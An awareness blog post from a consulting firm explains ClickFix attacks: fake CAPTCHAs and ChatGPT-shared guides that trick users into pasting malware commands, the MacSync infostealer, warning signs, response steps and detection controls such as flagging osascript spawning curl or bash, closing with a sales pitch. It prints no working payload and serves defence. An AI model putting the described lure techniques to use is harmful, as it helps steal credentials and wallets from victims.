The Attack That Tricks You Into Infecting Yourself

Imagine this: You’re browsing the web and a verification popup appears. It looks exactly like the Cloudflare or Google CAPTCHAs you’ve seen a thousand times. Or maybe you’re searching for how to clean up your Mac and find a helpful ChatGPT conversation with step-by-step instructions.

But instead of clicking pictures of traffic lights, you’re asked to press some keyboard shortcuts. Or instead of downloading a trusted app, you’re told to paste a single command into your Terminal.

It seems harmless. You follow the instructions.

And just like that, you’ve installed malware on your own computer — bypassing your antivirus, your firewall, and every security tool your company paid for.

This is ClickFix, one of the most dangerous and rapidly evolving attack techniques of 2026. And it now targets both Windows AND Mac users.

Why ClickFix Is So Dangerous

Traditional malware tries to sneak past your security software. ClickFix doesn’t bother. Instead, it tricks you into running the malware yourself.

When you — the user — deliberately execute a command, your computer trusts you. Your antivirus assumes you know what you’re doing. Your security software doesn’t intervene.

This is why the latest ClickFix variant discovered by Atos researchers bypassed Microsoft Defender entirely and was only discovered through manual threat hunting. It’s why Mac versions bypass Gatekeeper and XProtect — Apple’s built-in security tools.

Attackers aren’t trying to break through your defenses. They’re convincing you to open the door from the inside.

How ClickFix Attacks Work on Windows

The Windows version typically starts with a fake CAPTCHA or verification page. You might land on it through a phishing email, a compromised website, a malicious ad, or a poisoned search result.

The page looks completely legitimate — often using real Cloudflare branding, professional design, and familiar language like ‘Verify you are human.’

But then it asks you to do something unusual:

‘Press Win+R, then Ctrl+V, then Enter to verify.’

Here’s what actually happens:

1. Win+R opens the Windows Run dialog — a tool that executes commands directly on your computer
2. Ctrl+V pastes a malicious command that was secretly copied to your clipboard when you loaded the page
3. Enter executes that command

The Latest Windows Variant

The newest Windows ClickFix attack discovered by Atos researchers uses a particularly clever technique:

• The pasted command maps a remote server as a network drive on your computer
• It runs a batch file from that remote server
• The batch file downloads a trojanized version of WorkFlowy (a legitimate note-taking app)
• The infected app contacts the attacker’s server every 2 seconds, waiting for instructions
• The mapped drive is immediately removed to hide evidence

Because the attack uses ‘net use’ commands instead of PowerShell or other commonly monitored tools, it flew under the radar. Microsoft Defender didn’t catch it. Only manual threat hunting found it.

Other Windows Variants

ClickFix is evolving rapidly. Other recent Windows attacks include:

• Fake Windows Update screens — Full-screen pages showing ‘Working on updates… 95% complete’ with instructions to paste a command to ‘complete the security check’
• Windows Terminal attacks — Using Terminal instead of Run, since security tools have gotten better at monitoring Run-based attacks
• DNS-based staging — Using DNS lookups to retrieve malware, blending malicious activity into normal network traffic

How ClickFix Attacks Work on Mac

Mac users aren’t safe either. ClickFix campaigns targeting macOS have been evolving since late 2025, delivering the MacSync infostealer through increasingly sophisticated social engineering.

The ChatGPT Conversation Trick

One of the cleverest recent attacks uses actual shared ChatGPT conversations as bait.

Here’s how it works:

1. Attackers pay for Google ads that appear when you search for things like ‘how to clean up your Mac’ or ‘ChatGPT Atlas browser’
2. The ads lead to real shared conversations on the legitimate ChatGPT website
3. These conversations appear to be helpful guides, but they redirect you to fake GitHub-themed installation pages
4. The fake pages instruct you to open Terminal and paste a command to ‘complete the installation’
5. The command downloads and runs the MacSync infostealer

This attack is particularly dangerous because:

• The content is hosted on a trusted domain (OpenAI’s actual ChatGPT site)
• ChatGPT conversations are relatively new, so users don’t associate them with danger
• The instructions look like legitimate developer workflows

What MacSync Steals

The MacSync infostealer is comprehensive and terrifying. It harvests:

• Browser data — Passwords, cookies, autofill data, browsing history
• Cryptocurrency wallets — 25+ browser extension wallets (MetaMask, Phantom, Coinbase) plus desktop wallets (Exodus, Electrum, Atomic)
• Keychain databases — Wi-Fi passwords, application credentials, SSH keys
• Developer credentials — AWS credentials, Kubernetes configurations
• Telegram sessions — Allowing attackers to impersonate you

Even worse, MacSync can trojanize hardware wallet apps like Ledger and Trezor, injecting fake dialogs that steal your PIN and 24-word recovery phrase. That means attackers can drain your crypto wallets even if you use hardware security.

The Persistent Fake Password Dialog

MacSync includes a particularly nasty trick: it displays persistent fake ‘System Preferences’ dialogs asking for your macOS password. The dialogs keep appearing until you enter your password.

Once you do, MacSync saves your password in plaintext and uses it to decrypt your Keychain and browser data.

Evolution of Mac Attacks

Sophos researchers tracked three distinct campaigns between November 2025 and February 2026:

• November 2025: Classic ClickFix using fake ChatGPT/OpenAI download pages via Google ads
• December 2025: Shift to shared ChatGPT conversations redirecting to fake GitHub pages
• February 2026: Advanced multi-stage loaders with in-memory execution, making detection much harder

The February variant runs entirely in memory without writing files to disk, making it nearly invisible to traditional security tools.

The Numbers Are Alarming

ClickFix campaigns are highly effective. Sophos researchers found:

• Attackers built tracking infrastructure to monitor campaign success
• Hidden analytics collected IP addresses, geolocation, and timestamps
• Activity was reported directly to Telegram bots in real time
• Tens of thousands of user interactions across multiple domains within days of deployment

Microsoft’s security team has also been tracking these campaigns, noting that ClickFix-style attacks are now targeting popular AI and developer tools, with at least 20 distinct malware campaigns targeting AI and coding tools between February and March 2026 alone.

Why Your Antivirus Won’t Save You

Let’s be very clear about this: ClickFix attacks work because you run the malware yourself.

Security software is designed to stop malicious code from executing. But when you:

• Open the Run dialog and paste a command
• Open Terminal and paste a command
• Enter your password into a dialog box

…your computer assumes you know what you’re doing. The security software sees a user taking deliberate action and doesn’t intervene.

This is why multiple ClickFix variants have bypassed:

• Microsoft Defender
• macOS Gatekeeper
• macOS XProtect
• Various third-party antivirus tools

The only defense is you. Which means training is critical.

Warning Signs Everyone Needs to Know

Train yourself and your employees to recognize these red flags:

On Any Platform

• Instructions to run commands — No legitimate verification, CAPTCHA, or installation requires pasting commands into Run, PowerShell, Terminal, or Command Prompt
• Keyboard shortcut instructions — Win+R, Ctrl+V, or any unusual key combinations for ‘verification’
• Urgency or pressure — Countdowns, threats, ‘verify now or lose access’
• Instructions to paste something you didn’t intentionally copy

On Windows

• Fake CAPTCHAs asking you to press Win+R
• Full-screen ‘Windows Update’ pages with command instructions
• Pop-ups claiming your computer has a problem that requires running a command

On Mac

• Any website telling you to paste commands into Terminal
• ChatGPT conversations redirecting to installation pages
• Fake GitHub-themed installation interfaces
• Persistent ‘System Preferences’ dialogs asking for your password
• Instructions that include ‘curl’ or ‘bash’ commands

The Developer Problem

Here’s the uncomfortable truth: the ClickFix attack mimics something developers legitimately do every day.

Homebrew, Rust, nvm, and dozens of other tools install through ‘curl | sh’ in Terminal. Security teams can’t simply tell technical staff ‘never paste commands’ when that’s how half their toolchain works.

This means technical solutions are critical:

• Managed package registries — Control where software can be installed from
• MDM-enforced application distribution — Limit Terminal access for standard users
• Allowlisted installation sources — Take the decision out of individual hands

What to Do If You Think You Fell For It

If you followed suspicious instructions:

1. Disconnect from the network immediately — Unplug ethernet or turn off Wi-Fi
2. Don’t try to ‘undo’ anything yourself — You might make it worse
3. Contact your IT team or security professional immediately
4. Document what happened — What site, what you clicked, what commands you ran
5. Don’t log into any accounts — Your credentials may already be compromised
6. If you entered your Mac password into a suspicious dialog — Assume your Keychain is compromised and change all passwords

Quick action matters. The malware may still be establishing itself, and disconnecting can prevent data from being sent to attackers.

How to Protect Your Business

Technical controls alone won’t stop social engineering. Here’s what actually works:

1. Employee Training

Your employees are the target. They need to know:

• What ClickFix attacks look like on both Windows and Mac
• That legitimate sites NEVER ask for command execution
• What to do if they encounter a suspicious page
• That reporting is encouraged, not punished

One annual security presentation isn’t enough. These attacks evolve weekly.

2. Platform-Specific Controls

For Windows:

• Monitor RunMRU registry key for suspicious commands
• Restrict PowerShell and command execution where possible
• Use application control to limit what programs can run

For Mac:

• Push MDM profiles that block Terminal access for standard users
• Configure Privacy Preferences Policy Control to pre-deny Terminal Full Disk Access
• Deploy EDR rules that flag osascript spawning curl or bash processes

3. Web Filtering

Block known malicious domains and categories. While attackers constantly create new sites, filtering reduces exposure.

4. Simulated Phishing

Test employees with realistic ClickFix simulations. Find who’s vulnerable before attackers do.

5. Incident Response Planning

Have a plan. Know what you’ll do when — not if — someone falls for an attack. Test it regularly.

The Bottom Line

ClickFix represents a fundamental shift in how attackers operate. Instead of trying to break through your security, they trick you into bypassing it yourself.

These attacks work on Windows AND Mac. They evolve constantly. They bypass traditional security tools. And they’re spreading rapidly through increasingly clever social engineering — including using trusted platforms like ChatGPT to deliver malicious instructions.

Technology helps, but the real defense is awareness. Every employee needs to know: legitimate websites never ask you to run commands.

If a page asks you to press Win+R, paste something into Terminal, or run any command to ‘verify’ or ‘install’ something — close it immediately. It’s an attack.

We Can Help

At Pendergrass Consulting, we provide cybersecurity awareness training designed for real-world threats like ClickFix. Our training covers:

• Current attack techniques — Including platform-specific threats for both Windows and Mac
• Recognition training — Teaching employees to spot social engineering across devices
• Simulated phishing campaigns — Testing and reinforcing what employees learn
• Incident response guidance — Ensuring everyone knows what to do when something goes wrong
• Ongoing updates — Because threats evolve and training needs to keep pace

Don’t wait for an employee to fall for a fake CAPTCHA or a malicious ChatGPT link. Prepare them now.

Contact us today to schedule security awareness training for your team.

Pendergrass Consulting provides cybersecurity training, IT support, and technology consulting services throughout the Triangle area, including Raleigh, Durham, Chapel Hill, Cary, Apex, and the surrounding communities.